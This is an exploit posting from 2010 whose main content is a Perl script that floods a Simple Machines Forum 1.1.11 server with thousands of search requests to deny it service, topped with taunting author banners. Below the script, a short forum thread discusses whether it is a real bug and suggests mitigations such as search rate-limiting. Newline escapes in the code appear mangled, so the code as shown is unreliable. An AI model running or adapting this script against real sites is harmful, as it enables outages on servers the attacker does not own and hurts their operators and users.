######################################
[+] Exploit Title: Simple Machines Forums (SMF 1.1.11) Multiple Search DDOS
[+] Date: 2010-02-11
[+] Author: Ashiyane Digital Security Members (Cair3x)
[+] Software Link: http://www.simplemachines.org/
[+] Version: 1.1.11 And All Version
[+] Tested on: All
######################################
#!/usr/bin/perl
use IO::Socket;
print q{
##################################################
# He Smf Full Ver ha ha ha Multiple Search DOS #
# Tested on SMF 1.1.11 - 1.1.11 #
# Created By Cair3x ! ;) #
##################################################
[ Script ]
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$postit = "search=Cair3x+Cairex+Cair3x+Cair3x+Of+Iran+$x+ &search_terms=any&search_author=&search_forum=-1&search_time =0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=AS C&show_results=posts&return_chars=200";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$serv",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;
print $sock "POST $path"."index.php?action=search2 HTTP/1.1n";
print $sock "Host: $servn";
print $sock "Accept: text/_xml,application/_xml,application/xhtml+_xml,text/html;q=0 .9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
## Print a "+" for every loop
syswrite STDOUT, "+";
}
print "Forum Be Fuke Raft. Test Konid ...n";
[ / Script ]
######################################
BY : Cair3x [[email protected]]
Web Site : Ashiyane.org
Forum : Http://Ashiyane.org/forums/
[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good Frinds)
######################################
fix?
UP
cant fix this
this applies to any systm that does search when their isnt lots of servers to handel the load
I am not sure if this counts as an "exploit", especially since the same sort of crap could be done by script to just about ANY site running a script with db search capability....
Would it make sense to have a spamProtection like in SMF2?
SMF 2.0 stops this, also 1.1 can stop it with the form locks in the DB for high load.
Maybe just add a load average for searching in the default DB schema?
Else natural progression of the software has eradicated this, no longer a bug?